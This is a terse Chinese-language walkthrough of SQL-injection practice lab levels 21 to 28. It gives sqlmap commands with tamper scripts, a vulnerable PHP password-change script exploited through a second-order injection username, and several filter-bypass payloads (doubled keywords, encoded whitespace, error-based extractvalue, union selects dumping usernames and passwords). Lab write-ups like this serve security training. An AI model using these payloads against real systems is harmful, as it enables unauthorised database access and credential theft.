21
步骤
手动
注入点:
cookie
sqlmap
python sqlmap.py -r temp.txt --tamper base64encode.py --batch --dbms mysql
22
同上,')改为"
23
过滤了注释符,闭合后续单引号即可
sqlmap
24
步骤
手动
if (isset($_POST['submit']))
{
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";
}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '<font size="5" color="#FFFF00"><center>';
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php');
}
}
注册一个账号 admin' or 1=1 #
修改此账号密码,即修改了所有密码
sqlmap
25
步骤
手动
过滤了 and 和 or 可利用双写或者|| 代替
sqlmap
26
步骤
手动
过滤了 and 和 or 可利用双写或者|| 代替,并且过滤了注释符和空格还有斜杠
payload:1%27oorr(extractvalue(1,concat(0x7e,(select(database())),0x7e)))aandnd%20%271%27=%271
26a
步骤
手动
payload:?id=0%27)%0a%20union%a0%20select%a0%201,2,(select%a0%20group_concat(%20concat_ws(%200x7e,username,passwoorrd%20))%20%a0from%20(%a0security.users))%20;%00
27
步骤
手动
payload:0%27ununionion%0aseLect%0a1,2,3;%00
27a
步骤
手动
同上 '改成"
payload:0"ununionion%0aseLect%0a1,2,3;%00
28
步骤
手动
过滤union select不分大小写,可以在中间加all或者distinct
payload:?id=0%27)%0aunIon%0aall%0aseLect%0a1,2,3;%00
文章评论